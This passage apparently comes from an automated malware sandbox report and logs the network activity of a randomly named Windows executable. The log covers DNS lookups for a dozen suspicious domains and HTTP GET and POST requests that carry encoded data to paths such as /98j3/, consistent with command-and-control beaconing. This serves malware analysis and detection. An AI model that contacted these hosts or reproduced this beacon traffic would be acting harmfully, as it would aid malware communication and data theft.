                                                                                                              Jan 11, 2025 03:27:12.784564018 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.784600973 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.784615040 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.784703016 CET5156380192.168.2.10208.91.197.39
                                                                                                              Jan 11, 2025 03:27:12.784703970 CET5156380192.168.2.10208.91.197.39
                                                                                                              Jan 11, 2025 03:27:12.784847021 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.784857988 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.784953117 CET5156380192.168.2.10208.91.197.39
                                                                                                              Jan 11, 2025 03:27:12.829351902 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.829504967 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.829528093 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.829543114 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.829555988 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.829569101 CET5156380192.168.2.10208.91.197.39
                                                                                                              Jan 11, 2025 03:27:12.829590082 CET5156380192.168.2.10208.91.197.39
                                                                                                              Jan 11, 2025 03:27:12.829737902 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.829790115 CET5156380192.168.2.10208.91.197.39
                                                                                                              Jan 11, 2025 03:27:12.874413967 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.874447107 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.874459028 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.874633074 CET5156380192.168.2.10208.91.197.39
                                                                                                              Jan 11, 2025 03:27:12.874656916 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.874667883 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.874839067 CET5156380192.168.2.10208.91.197.39
                                                                                                              Jan 11, 2025 03:27:12.874857903 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.874965906 CET5156380192.168.2.10208.91.197.39
                                                                                                              Jan 11, 2025 03:27:12.919189930 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.919209003 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.919228077 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.919239044 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.919369936 CET5156380192.168.2.10208.91.197.39
                                                                                                              Jan 11, 2025 03:27:12.919431925 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.919444084 CET5156380192.168.2.10208.91.197.39
                                                                                                              Jan 11, 2025 03:27:12.919492006 CET5156380192.168.2.10208.91.197.39
                                                                                                              Jan 11, 2025 03:27:12.924371958 CET5156380192.168.2.10208.91.197.39
                                                                                                              Jan 11, 2025 03:27:12.929234982 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:17.961138964 CET5156480192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:17.967442989 CET805156443.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:17.967531919 CET5156480192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:17.985789061 CET5156480192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:17.990746021 CET805156443.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:18.812952042 CET805156443.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:18.813049078 CET805156443.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:18.813215017 CET5156480192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:19.494910955 CET5156480192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:20.513711929 CET5156580192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:20.518865108 CET805156543.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:20.518951893 CET5156580192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:20.534059048 CET5156580192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:20.538971901 CET805156543.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:21.365241051 CET805156543.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:21.365267038 CET805156543.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:21.365405083 CET5156580192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:22.041532040 CET5156580192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:23.061124086 CET5156680192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:23.066323042 CET805156643.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:23.066472054 CET5156680192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:23.080753088 CET5156680192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:23.086766005 CET805156643.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:23.086802006 CET805156643.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:23.923000097 CET805156643.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:23.923063040 CET805156643.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:23.923124075 CET5156680192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:24.589719057 CET5156680192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:25.608016968 CET5156780192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:25.613069057 CET805156743.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:25.613171101 CET5156780192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:25.625957012 CET5156780192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:25.630896091 CET805156743.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:26.532979012 CET805156743.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:26.533086061 CET805156743.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:26.533154964 CET5156780192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:26.536716938 CET5156780192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:26.541521072 CET805156743.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:31.570478916 CET5156880192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:31.575488091 CET8051568188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:31.581444025 CET5156880192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:31.591665983 CET5156880192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:31.596684933 CET8051568188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:33.106848955 CET5156880192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:33.112138987 CET8051568188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:33.114912987 CET5156880192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:34.139203072 CET5156980192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:34.144174099 CET8051569188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:34.144278049 CET5156980192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:34.177995920 CET5156980192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:34.182957888 CET8051569188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:35.682271957 CET5156980192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:35.688771963 CET8051569188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:35.688838959 CET5156980192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:36.767389059 CET5157080192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:36.772567034 CET8051570188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:36.772706032 CET5157080192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:36.788934946 CET5157080192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:36.793884039 CET8051570188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:36.794042110 CET8051570188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:38.291580915 CET5157080192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:38.296701908 CET8051570188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:38.296801090 CET5157080192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:39.312074900 CET5157180192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:39.318622112 CET8051571188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:39.319014072 CET5157180192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:39.330887079 CET5157180192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:39.337284088 CET8051571188.114.97.3192.168.2.10

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 11, 2025 03:24:32.481313944 CET6081853192.168.2.101.1.1.1
                                                                                                              Jan 11, 2025 03:24:33.166651964 CET53608181.1.1.1192.168.2.10
                                                                                                              Jan 11, 2025 03:24:36.112626076 CET5352464162.159.36.2192.168.2.10
                                                                                                              Jan 11, 2025 03:24:36.647425890 CET53621471.1.1.1192.168.2.10
                                                                                                              Jan 11, 2025 03:24:49.232856035 CET5265653192.168.2.101.1.1.1
                                                                                                              Jan 11, 2025 03:24:49.247107983 CET53526561.1.1.1192.168.2.10
                                                                                                              Jan 11, 2025 03:25:05.641524076 CET6436953192.168.2.101.1.1.1
                                                                                                              Jan 11, 2025 03:25:05.761153936 CET53643691.1.1.1192.168.2.10
                                                                                                              Jan 11, 2025 03:25:19.028928995 CET6418553192.168.2.101.1.1.1
                                                                                                              Jan 11, 2025 03:25:19.528510094 CET53641851.1.1.1192.168.2.10
                                                                                                              Jan 11, 2025 03:25:32.878221989 CET5937553192.168.2.101.1.1.1
                                                                                                              Jan 11, 2025 03:25:32.894695044 CET53593751.1.1.1192.168.2.10
                                                                                                              Jan 11, 2025 03:25:46.299457073 CET5009153192.168.2.101.1.1.1
                                                                                                              Jan 11, 2025 03:25:46.819602013 CET53500911.1.1.1192.168.2.10
                                                                                                              Jan 11, 2025 03:26:00.139420986 CET5172653192.168.2.101.1.1.1
                                                                                                              Jan 11, 2025 03:26:00.859113932 CET53517261.1.1.1192.168.2.10
                                                                                                              Jan 11, 2025 03:26:34.891976118 CET6223653192.168.2.101.1.1.1
                                                                                                              Jan 11, 2025 03:26:35.437407970 CET53622361.1.1.1192.168.2.10
                                                                                                              Jan 11, 2025 03:26:49.157565117 CET5823253192.168.2.101.1.1.1
                                                                                                              Jan 11, 2025 03:26:49.464622974 CET53582321.1.1.1192.168.2.10
                                                                                                              Jan 11, 2025 03:27:03.030003071 CET5938653192.168.2.101.1.1.1
                                                                                                              Jan 11, 2025 03:27:03.283600092 CET53593861.1.1.1192.168.2.10
                                                                                                              Jan 11, 2025 03:27:17.937376022 CET5869853192.168.2.101.1.1.1
                                                                                                              Jan 11, 2025 03:27:17.957658052 CET53586981.1.1.1192.168.2.10
                                                                                                              Jan 11, 2025 03:27:31.545994997 CET4980653192.168.2.101.1.1.1
                                                                                                              Jan 11, 2025 03:27:31.559396982 CET53498061.1.1.1192.168.2.10

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 11, 2025 03:24:32.481313944 CET192.168.2.101.1.1.10xdaeeStandard query (0)www.thaor56.onlineA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:24:49.232856035 CET192.168.2.101.1.1.10x53a9Standard query (0)www.optimismbank.xyzA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:25:05.641524076 CET192.168.2.101.1.1.10x34bbStandard query (0)www.greenthub.lifeA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:25:19.028928995 CET192.168.2.101.1.1.10x6553Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:25:32.878221989 CET192.168.2.101.1.1.10x4cddStandard query (0)www.bankseedz.infoA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:25:46.299457073 CET192.168.2.101.1.1.10x7a1aStandard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:26:00.139420986 CET192.168.2.101.1.1.10x1ed9Standard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:26:34.891976118 CET192.168.2.101.1.1.10x6a0eStandard query (0)www.yc791022.asiaA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:26:49.157565117 CET192.168.2.101.1.1.10x930bStandard query (0)www.43kdd.topA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:27:03.030003071 CET192.168.2.101.1.1.10x19faStandard query (0)www.jcsa.infoA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:27:17.937376022 CET192.168.2.101.1.1.10x800eStandard query (0)www.1secondlending.oneA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:27:31.545994997 CET192.168.2.101.1.1.10x6ab2Standard query (0)www.zkdamdjj.shopA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 11, 2025 03:23:45.092792034 CET1.1.1.1192.168.2.100x8491No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:23:45.092792034 CET1.1.1.1192.168.2.100x8491No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:24:33.166651964 CET1.1.1.1192.168.2.100xdaeeNo error (0)www.thaor56.onlinethaor56.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:24:33.166651964 CET1.1.1.1192.168.2.100xdaeeNo error (0)thaor56.online202.92.5.23A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:24:49.247107983 CET1.1.1.1192.168.2.100x53a9No error (0)www.optimismbank.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:24:49.247107983 CET1.1.1.1192.168.2.100x53a9No error (0)www.optimismbank.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:25:05.761153936 CET1.1.1.1192.168.2.100x34bbNo error (0)www.greenthub.life209.74.77.109A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:25:19.528510094 CET1.1.1.1192.168.2.100x6553No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:25:19.528510094 CET1.1.1.1192.168.2.100x6553No error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:25:19.528510094 CET1.1.1.1192.168.2.100x6553No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:25:19.528510094 CET1.1.1.1192.168.2.100x6553No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:25:19.528510094 CET1.1.1.1192.168.2.100x6553No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:25:32.894695044 CET1.1.1.1192.168.2.100x4cddNo error (0)www.bankseedz.info46.30.211.38A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:25:46.819602013 CET1.1.1.1192.168.2.100x7a1aNo error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:26:00.859113932 CET1.1.1.1192.168.2.100x1ed9No error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:26:35.437407970 CET1.1.1.1192.168.2.100x6a0eNo error (0)www.yc791022.asia101.35.209.183A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:26:49.464622974 CET1.1.1.1192.168.2.100x930bNo error (0)www.43kdd.top43kdd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:26:49.464622974 CET1.1.1.1192.168.2.100x930bNo error (0)43kdd.top154.23.178.231A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:27:03.283600092 CET1.1.1.1192.168.2.100x19faNo error (0)www.jcsa.info208.91.197.39A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:27:17.957658052 CET1.1.1.1192.168.2.100x800eNo error (0)www.1secondlending.one43.205.198.29A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:27:31.559396982 CET1.1.1.1192.168.2.100x6ab2No error (0)www.zkdamdjj.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 03:27:31.559396982 CET1.1.1.1192.168.2.100x6ab2No error (0)www.zkdamdjj.shop188.114.96.3A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • www.thaor56.online
                                                                                                              • www.optimismbank.xyz
                                                                                                              • www.greenthub.life
                                                                                                              • www.laohub10.net
                                                                                                              • www.bankseedz.info
                                                                                                              • www.madhf.tech
                                                                                                              • www.xcvbj.asia
                                                                                                              • www.yc791022.asia
                                                                                                              • www.43kdd.top
                                                                                                              • www.jcsa.info
                                                                                                              • www.1secondlending.one
                                                                                                              • www.zkdamdjj.shop

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.1049981202.92.5.23806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:24:33.257515907 CET489OUTGET /fev0/?6n=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/+Qn9LZj60FJTogwY+WbqWfqijUMg==&P8dT=Gvw8Prk0H4 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Connection: close
                                                                                                              Host: www.thaor56.online
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Jan 11, 2025 03:24:34.151530981 CET1236INHTTP/1.1 404 Not Found
                                                                                                              Connection: close
                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                              pragma: no-cache
                                                                                                              content-type: text/html
                                                                                                              content-length: 1251
                                                                                                              date: Sat, 11 Jan 2025 02:24:33 GMT
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                                              Jan 11, 2025 03:24:34.151547909 CET234INData Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69
                                                                                                              Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.105152813.248.169.48806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:24:49.274996042 CET759OUTPOST /98j3/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 191
                                                                                                              Connection: close
                                                                                                              Host: www.optimismbank.xyz
                                                                                                              Origin: http://www.optimismbank.xyz
                                                                                                              Referer: http://www.optimismbank.xyz/98j3/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 5a 74 78 75 65 35 57 6d 69 48 55 59 31 75 53 2b 47 31 6f 4a 62 6f 35 2f 54 32 4f 5a 46 2f 7a 48 58 6c 63 4b 41 64 45 52 49 6a 50 4a 75 62 46 61 65 4e 6e 64 30 59 79 64 34 57 79 76 48 62 4f 42 62 59 64 79 64 66 4c 45 50 49 62 6b 54 4b 4e 52 4f 54 6f 76 75 59 68 75 4a 41 49 75 31 5a 30 59 48 37 67 42 58 63 43 42 42 4f 61 49 34 67 6b 32 47 62 34 76 48 33 6c 36 51 46 4d 67 41 62 66 43 58 55 6e 45 5a 31 35 51 74 39 6b 51 6e 2b 48 70 6f 42 77 4d 70 45 55 71 41 76 65 39 33 6d 7a 58 62 41 6e 43 39 6c 4b 35 77 50 30 75 44 32 64 76
                                                                                                              Data Ascii: 6n=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMpEUqAve93mzXbAnC9lK5wP0uD2dv
                                                                                                              Jan 11, 2025 03:24:49.713860035 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                              content-length: 0
                                                                                                              connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.105152913.248.169.48806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:24:51.857460976 CET783OUTPOST /98j3/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 215
                                                                                                              Connection: close
                                                                                                              Host: www.optimismbank.xyz
                                                                                                              Origin: http://www.optimismbank.xyz
                                                                                                              Referer: http://www.optimismbank.xyz/98j3/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 59 4e 42 75 5a 72 2b 6d 7a 6e 55 62 70 2b 53 2b 4a 56 6f 4e 62 6f 39 2f 54 7a 72 43 46 4a 6a 48 58 45 73 4b 48 5a 51 52 4c 6a 50 4a 6d 37 46 62 42 64 6e 53 30 59 50 69 34 58 2b 76 48 62 61 42 62 61 46 79 42 34 2f 48 50 59 62 6d 4b 61 4e 45 4b 54 6f 76 75 59 68 75 4a 41 64 31 31 64 51 59 48 4c 51 42 56 34 57 43 49 75 61 4c 78 41 6b 32 4d 4c 34 72 48 33 6c 59 51 42 4e 39 41 5a 6e 43 58 55 58 45 5a 41 5a 54 34 4e 6b 73 36 4f 47 56 6f 78 64 6f 6b 57 59 57 41 4e 61 43 6e 32 66 6b 59 68 61 46 73 30 72 75 6a 34 6f 67 4e 77 6f 46 33 70 54 6c 55 46 39 6f 53 53 6b 6a 58 44 54 74 57 47 41 50 58 77 3d 3d
                                                                                                              Data Ascii: 6n=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJjHXEsKHZQRLjPJm7FbBdnS0YPi4X+vHbaBbaFyB4/HPYbmKaNEKTovuYhuJAd11dQYHLQBV4WCIuaLxAk2ML4rH3lYQBN9AZnCXUXEZAZT4Nks6OGVoxdokWYWANaCn2fkYhaFs0ruj4ogNwoF3pTlUF9oSSkjXDTtWGAPXw==
                                                                                                              Jan 11, 2025 03:24:52.334850073 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                              content-length: 0
                                                                                                              connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.105153013.248.169.48806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:24:54.592302084 CET1796OUTPOST /98j3/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 1227
                                                                                                              Connection: close
                                                                                                              Host: www.optimismbank.xyz
                                                                                                              Origin: http://www.optimismbank.xyz
                                                                                                              Referer: http://www.optimismbank.xyz/98j3/
